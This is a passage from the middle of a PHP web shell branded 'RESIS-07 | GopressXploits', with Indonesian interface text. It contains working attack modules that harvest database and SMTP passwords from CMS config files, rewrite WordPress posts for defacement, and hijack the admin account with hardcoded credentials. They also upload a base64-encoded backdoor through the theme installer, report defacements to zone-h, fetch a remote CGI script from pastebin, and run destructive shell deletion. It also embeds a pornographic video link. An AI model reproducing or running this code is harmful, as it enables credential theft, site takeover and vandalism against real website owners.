  2335. PASS: <br>
  2336. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2337. function cp_pass($dir) {
  2338. $pass = "";
  2339. $dira = scandir($dir);
  2340. foreach($dira as $dirb) {
  2341. if(!is_file("$dir/$dirb")) continue;
  2342. $ambil = file_get_contents("$dir/$dirb");
  2343. if(preg_match("/WordPress/", $ambil)) {
  2344. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2345. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2346. $pass .= ambilkata($ambil,"password = '","'")."\n";
  2347. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2348. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2349. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2350. $pass .= ambilkata($ambil,'password = "','"')."\n";
  2351. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2352. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2353. } elseif(preg_match("/^[client]$/", $ambil)) {
  2354. preg_match("/password=(.*?)/", $ambil, $pass1);
  2355. if(preg_match('/"/', $pass1[1])) {
  2356. $pass1[1] = str_replace('"', "", $pass1[1]);
  2357. $pass .= $pass1[1]."\n";
  2358. } else {
  2359. $pass .= $pass1[1]."\n";
  2360. }
  2361. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2362. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2363. }
  2364. }
  2365. echo $pass;
  2366. }
  2367. $cp_pass = cp_pass($dir);
  2368. echo $cp_pass;
  2369. echo "</textarea><br>
  2370. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2371. </form>
  2372. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2373. }
  2374. } elseif($_GET['do'] == 'smtp') {
  2375. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2376. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2377. echo "</div>";
  2378. function scj($dir) {
  2379. $dira = scandir($dir);
  2380. foreach($dira as $dirb) {
  2381. if(!is_file("$dir/$dirb")) continue;
  2382. $ambil = file_get_contents("$dir/$dirb");
  2383. $ambil = str_replace("$", "", $ambil);
  2384. if(preg_match("/JConfig|joomla/", $ambil)) {
  2385. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2386. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2387. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2388. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2389. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2390. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2391. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>[+] SMTP Grabber[+]</div>";
  2392. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2393. echo "SMTP Host: <font color=cyan>$smtp_host</font><br>";
  2394. echo "SMTP port: <font color=cyan>$smtp_port</font><br>";
  2395. echo "SMTP user: <font color=cyan>$smtp_user</font><br>";
  2396. echo "SMTP pass: <font color=cyan>$smtp_pass</font><br>";
  2397. echo "SMTP auth: <font color=cyan>$smtp_auth</font><br>";
  2398. echo "SMTP secure: <font color=cyan>$smtp_secure</font><br><br>";
  2399. }
  2400. }
  2401. }
  2402. $smpt_hunter = scj($dir);
  2403. echo $smpt_hunter;
  2404. } elseif($_GET['do'] == 'aetw') {
  2405. if($_POST['hajar']) {
  2406. $title = htmlspecialchars($_POST['new_title']);
  2407. $pn_title = str_replace(" ", "-", $title);
  2408. if($_POST['cek_edit'] == "Y") {
  2409. $script = $_POST['edit_content'];
  2410. } else {
  2411. $script = $title;
  2412. }
  2413. $conf = $_POST['config_dir'];
  2414. $scan_conf = scandir($conf);
  2415. foreach($scan_conf as $file_conf) {
  2416. if(!is_file("$conf/$file_conf")) continue;
  2417. $config = file_get_contents("$conf/$file_conf");
  2418. if(preg_match("/WordPress/", $config)) {
  2419. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2420. $dbuser = ambilkata($config,"DB_USER', '","'");
  2421. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2422. $dbname = ambilkata($config,"DB_NAME', '","'");
  2423. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2424. $prefix = $dbprefix."posts";
  2425. $option = $dbprefix."options";
  2426. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2427. $db = mysql_select_db($dbname);
  2428. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2429. $result = mysql_fetch_array($q);
  2430. $id = $result[ID];
  2431. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2432. $result2 = mysql_fetch_array($q2);
  2433. $target = $result2[option_value];
  2434. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2435. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2436. echo "<div style='margin: 5px auto;'>";
  2437. if($target == '') {
  2438. echo "URL: <font color=red>error, domainnya mati ditelan bumi</font> -> ";
  2439. } else {
  2440. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2441. }
  2442. if(!$update OR !$conn OR !$db) {
  2443. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2444. } else {
  2445. echo "<font color=green>sukses di ganti.</font><br>";
  2446. }
  2447. echo "</div>";
  2448. mysql_close($conn);
  2449. }
  2450. }
  2451. } else {
  2452. echo "<center>
  2453. <h1>Auto Edit Title+Content WordPress</h1>
  2454. <form method='post'>
  2455. DIR Config: <br>
  2456. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2457. Set Title: <br>
  2458. <input type='text' name='new_title' value='Hacked by RESIS-07 | GopressXploits' placeholder='New Title'><br><br>
  2459. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2460. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2461. <textarea name='edit_content' placeholder='contoh script: https://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2462. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2463. </form>
  2464. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2465. ";
  2466. }
  2467. } elseif($_GET['do'] == 'zoneh') {
  2468. if($_POST['submit']) {
  2469. $domain = explode("\r\n", $_POST['url']);
  2470. $nick = $_POST['nick'];
  2471. echo "Defacer Onhold: <a href='https://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>https://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2472. echo "Defacer Archive: <a href='https://www.zone-h.org/archive/notifier=$nick' target='_blank'>https://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2473. function zoneh($url,$nick) {
  2474. $ch = curl_init("https://www.zone-h.com/notify/single");
  2475. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2476. curl_setopt($ch, CURLOPT_POST, true);
  2477. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2478. return curl_exec($ch);
  2479. curl_close($ch);
  2480. }
  2481. foreach($domain as $url) {
  2482. $zoneh = zoneh($url,$nick);
  2483. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2484. echo "$url -> <font color=cyan>OK</font><br>";
  2485. } else {
  2486. echo "$url -> <font color=red>ERROR</font><br>";
  2487. }
  2488. }
  2489. } else {
  2490. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Zone-H [+]</div>";
  2491. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2492. echo "<center><form method='post'>
  2493. <u>Defacer</u>: <br>
  2494. <input type='text' name='nick' size='50' value='RESIS-07'><br>
  2495. <u>Domains</u>: <br>
  2496. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2497. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2498. </form>";
  2499. }
  2500. echo "</center>";
  2501. } elseif($_GET['do'] == 'cgi') {
  2502. $cgi_dir = mkdir('human_cgi', 0755);
  2503. $file_cgi = "human_cgi/cgi.izo";
  2504. $isi_htcgi = "AddHandler cgi-script .izo";
  2505. $htcgi = fopen(".htaccess", "w");
  2506. fwrite($htcgi, $isi_htcgi);
  2507. fclose($htcgi);
  2508. $cgi_script = getsource("https://pastebin.com/raw/Lj46KxFT");
  2509. $cgi = fopen($file_cgi, "w");
  2510. fwrite($cgi, $cgi_script);
  2511. fclose($cgi);
  2512. chmod($file_cgi, 0755);
  2513. echo "<iframe src='human_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2514. }
  2515. elseif($_GET['do'] == 'videosex') {
  2516. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Streaming Video Sex [+]</div>";
  2517. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2518. echo "<video src='https://videobokep.co/v/93.mp4' controls></video>";
  2519. }
  2520. elseif($_GET['do'] == 'adminer') {
  2521. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2522. function adminer($url, $isi) {
  2523. $fp = fopen($isi, "w");
  2524. $ch = curl_init();
  2525. curl_setopt($ch, CURLOPT_URL, $url);
  2526. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2527. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2528. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2529. curl_setopt($ch, CURLOPT_FILE, $fp);
  2530. return curl_exec($ch);
  2531. curl_close($ch);
  2532. fclose($fp);
  2533. ob_flush();
  2534. flush();
  2535. }
  2536. if(file_exists('adminer.php')) {
  2537. echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2538. } else {
  2539. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2540. echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2541. } else {
  2542. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2543. echo "<center><font color=red>gagal buat file adminer</font></center>";
  2544. }
  2545. }
  2546. } elseif($_GET['do'] == 'adw') {
  2547. if($_POST['auto_deface_wp']) {
  2548. function anucurl($sites) {
  2549. $ch = curl_init($sites);
  2550. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2551. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2552. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2553. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2554. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2555. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2556. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2557. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2558. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2559. $data = curl_exec($ch);
  2560. curl_close($ch);
  2561. return $data;
  2562. }
  2563. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2564. $post = array(
  2565. "log" => "$userr",
  2566. "pwd" => "$pass",
  2567. "rememberme" => "forever",
  2568. "wp-submit" => "$wp_submit",
  2569. "redirect_to" => "$web",
  2570. "testcookie" => "1",
  2571. );
  2572. $ch = curl_init($cek);
  2573. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2574. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2575. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2576. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2577. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2578. curl_setopt($ch, CURLOPT_POST, 1);
  2579. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2580. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2581. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2582. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2583. $data = curl_exec($ch);
  2584. curl_close($ch);
  2585. return $data;
  2586. }
  2587. $scan = $_POST['link_config'];
  2588. $link_config = scandir($scan);
  2589. $script = htmlspecialchars($_POST['script']);
  2590. $user = "gandatamvan";
  2591. $pass = "gandatamvan";
  2592. $passx = md5($pass);
  2593. foreach($link_config as $dir_config) {
  2594. if(!is_file("$scan/$dir_config")) continue;
  2595. $config = file_get_contents("$scan/$dir_config");
  2596. if(preg_match("/WordPress/", $config)) {
  2597. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2598. $dbuser = ambilkata($config,"DB_USER', '","'");
  2599. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2600. $dbname = ambilkata($config,"DB_NAME', '","'");
  2601. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2602. $prefix = $dbprefix."users";
  2603. $option = $dbprefix."options";
  2604. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2605. $db = mysql_select_db($dbname);
  2606. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2607. $result = mysql_fetch_array($q);
  2608. $id = $result[ID];
  2609. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2610. $result2 = mysql_fetch_array($q2);
  2611. $target = $result2[option_value];
  2612. if($target == '') {
  2613. echo "[-] <font color=red>error, domainnya mati ditelan bumi</font><br>";
  2614. } else {
  2615. echo "[+] $target <br>";
  2616. }
  2617. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2618. if(!$conn OR !$db OR !$update) {
  2619. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2620. mysql_close($conn);
  2621. } else {
  2622. $site = "$target/wp-login.php";
  2623. $site2 = "$target/wp-admin/theme-install.php?upload";
  2624. $b1 = anucurl($site2);
  2625. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2626. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2627. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2628. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2629. $www = "m.php";
  2630. $fp5 = fopen($www,"w");
  2631. fputs($fp5,$upload3);
  2632. $post2 = array(
  2633. "_wpnonce" => "$anu2",
  2634. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2635. "themezip" => "@$www",
  2636. "install-theme-submit" => "Install Now",
  2637. );
  2638. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2639. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2640. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2641. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2642. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2643. curl_setopt($ch, CURLOPT_POST, 1);
  2644. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2645. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2646. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2647. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2648. $data3 = curl_exec($ch);
  2649. curl_close($ch);
  2650. $y = date("Y");
  2651. $m = date("m");
  2652. $namafile = "id.php";
  2653. $fpi = fopen($namafile,"w");
  2654. fputs($fpi,$script);
  2655. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2656. curl_setopt($ch6, CURLOPT_POST, true);
  2657. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2658. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2659. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2660. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2661. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2662. $postResult = curl_exec($ch6);
  2663. curl_close($ch6);
  2664. $as = "$target/k.php";
  2665. $bs = anucurl($as);
  2666. if(preg_match("#$script#is", $bs)) {
  2667. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2668. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2669. } else {
  2670. echo "[-] <font color='red'>gagal mepes...</font><br>";
  2671. echo "[!!] coba aja manual: <br>";
  2672. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2673. echo "[+] username: <font color=Green>$user</font><br>";
  2674. echo "[+] password: <font color=Green>$pass</font><br><br>";
  2675. }
  2676. mysql_close($conn);
  2677. }
  2678. }
  2679. }
  2680. } else {
  2681. echo "<center><h1>WordPress Auto Deface</h1>
  2682. <form method='post'>
  2683. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2684. <input type='text' name='script' height='10' size='50' placeholder='Hacked by RESIS-07 | GopressXploits' required><br>
  2685. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2686. </form>
  2687. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2688. </center>";
  2689. }
  2690. } elseif($_GET['do'] == 'phinfo')
  2691. {@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div>";}
  2692. elseif($_GET['act'] == 'newfile') {
  2693. if($_POST['new_save_file']) {
  2694. $newfile = htmlspecialchars($_POST['newfile']);
  2695. $fopen = fopen($newfile, "a+");
  2696. if($fopen) {
  2697. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2698. } else {
  2699. $act = "<font color=red>permission denied</font>";
  2700. }
  2701. }
  2702. echo $act;
  2703. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Create File [+]</div>";
  2704. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2705. echo "<form method='post'>
  2706. Filename: <input type='text' name='newfile' value='$dir/asu.php' style='width: 450px;' height='10'>
  2707. <input type='submit' name='new_save_file' value='Submit'>
  2708. </form>";
  2709. } elseif($_GET['act'] == 'newfolder') {
  2710. if($_POST['new_save_folder']) {
  2711. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2712. if(!mkdir($new_folder)) {
  2713. $act = "<font color=red>permission denied</font>";
  2714. } else {
  2715. $act = "<script>window.location='?dir=".$dir."';</script>";
  2716. }
  2717. }
  2718. echo $act;
  2719. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Create Folder DIR [+]</div>";
  2720. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2721. echo "<form method='post'>
  2722. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2723. <input type='submit' name='new_save_folder' value='Submit'>
  2724. </form>";
  2725. } elseif($_GET['act'] == 'rename_dir') {
  2726. if($_POST['dir_rename']) {
  2727. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2728. if($dir_rename) {
  2729. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2730. } else {
  2731. $act = "<font color=red>permission denied</font>";
  2732. }
  2733. echo "".$act."<br>";
  2734. }
  2735. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Rename File / DIR [+]</div>";
  2736. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2737. echo "<form method='post'>
  2738. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2739. <input type='submit' name='dir_rename' value='rename'>
  2740. </form>";
  2741. } elseif($_GET['act'] == 'delete_dir') {
  2742. if(is_dir($dir)) {
  2743. if(is_writable($dir)) {
  2744. @rmdir($dir);
  2745. @exe("rm -rf $dir");
  2746. @exe("rmdir /s /q $dir");
  2747. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2748. } else {
  2749. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2750. }
  2751. }
  2752. echo $act;
  2753. } elseif($_GET['act'] == 'view') {
  2754. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] View File [+]</div>";
  2755. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2756. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2757. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2758. } elseif($_GET['act'] == 'edit') {
  2759. if($_POST['save']) {
  2760. $save = file_put_contents($_GET['file'], $_POST['src']);
  2761. if($save) {
  2762. $act = "<font color=cyan>Saved!</font>";
  2763. } else {
  2764. $act = "<font color=red>permission denied</font>";
  2765. }
  2766. echo "".$act."<br>";
  2767. }
  2768. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Edit File [+]</div>";
  2769. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2770. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2771. echo "<form method='post'>
  2772. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2773. <input type='submit' value='Save' name='save' style='width: 500px;'>
  2774. </form>";
  2775. } elseif($_GET['act'] == 'rename') {
  2776. if($_POST['do_rename']) {
  2777. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2778. if($rename) {
  2779. $act = "<script>window.location='?dir=".$dir."';</script>";
  2780. } else {
  2781. $act = "<font color=red>permission denied</font>";
  2782. }
  2783. echo "".$act."<br>";
  2784. }
  2785. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Rename [+]</div>";
  2786. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2787. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2788. echo "<form method='post'>
  2789. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2790. <input type='submit' name='do_rename' value='rename'>
  2791. </form>";
  2792. } elseif($_GET['act'] == 'delete') {
  2793. $delete = unlink($_GET['file']);
  2794. if($delete) {
  2795. $act = "<script>window.location='?dir=".$dir."';</script>";
  2796. } else {
  2797. $act = "<font color=red>permission denied</font>";
  2798. }
  2799. echo $act;
  2800. } else {
  2801. if(is_dir($dir) === true) {
  2802. if(!is_readable($dir)) {
  2803. echo "<font color=red>can't open directory. ( not readable )</font>";
  2804. } else {
  2805. echo '<table width="100%" class="human" border="0" cellpadding="3" cellspacing="1" align="center">
  2806. <tr>
  2807. <th class="th_home"><center>Name</center></th>
  2808. <th class="th_home"><center>Type</center></th>
  2809. <th class="th_home"><center>Size</center></th>
  2810. <th class="th_home"><center>Last Modified</center></th>
  2811. <th class="th_home"><center>Owner/Group</center></th>
  2812. <th class="th_home"><center>Permission</center></th>
  2813. <th class="th_home"><center>Action</center></th>
  2814. </tr>';
  2815. $scandir = scandir($dir);
  2816. foreach($scandir as $dirx) {
  2817. $dtype = filetype("$dir/$dirx");
  2818. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2819. if(function_exists('posix_getpwuid')) {
  2820. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2821. $downer = $downer['name'];
  2822. } else {
  2823. //$downer = $uid;
  2824. $downer = fileowner("$dir/$dirx");
  2825. }
  2826. if(function_exists('posix_getgrgid')) {
  2827. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2828. $dgrp = $dgrp['name'];
  2829. } else {
  2830. $dgrp = filegroup("$dir/$dirx");
  2831. }
  2832. if(!is_dir("$dir/$dirx")) continue;
  2833. if($dirx === '..') {
  2834. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2835. } elseif($dirx === '.') {
  2836. $href = "<a href='?dir=$dir'>$dirx</a>";
  2837. } else {
  2838. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2839. }
  2840. if($dirx === '.' || $dirx === '..') {
  2841. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2842. } else {
  2843. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2844. }
  2845. echo "<tr>";
  2846. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2847. echo "<td class='td_home'><center>$dtype</center></td>";
  2848. echo "<td class='td_home'><center>-</center></th></td>";
  2849. echo "<td class='td_home'><center>$dtime</center></td>";
  2850. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2851. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2852. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2853. echo "</tr>";
  2854. }
  2855. }
  2856. } else {
  2857. echo "<center>";
  2858. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2859. echo "<font color=red>can't open directory.</font>";
  2860. }
  2861. foreach($scandir as $file) {
  2862. $ftype = filetype("$dir/$file");
  2863. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2864. $size = filesize("$dir/$file")/1024;
  2865. $size = round($size,3);
  2866. if(function_exists('posix_getpwuid')) {
  2867. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2868. $fowner = $fowner['name'];
  2869. } else {
  2870. //$downer = $uid;
  2871. $fowner = fileowner("$dir/$file");
  2872. }
  2873. if(function_exists('posix_getgrgid')) {
  2874. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2875. $fgrp = $fgrp['name'];
  2876. } else {
  2877. $fgrp = filegroup("$dir/$file");
  2878. }
  2879. if($size > 1024) {
  2880. $size = round($size/1024,2). 'MB';
  2881. } else {
  2882. $size = $size. 'KB';
  2883. }
  2884. if(!is_file("$dir/$file")) continue;
  2885. echo "<tr>";
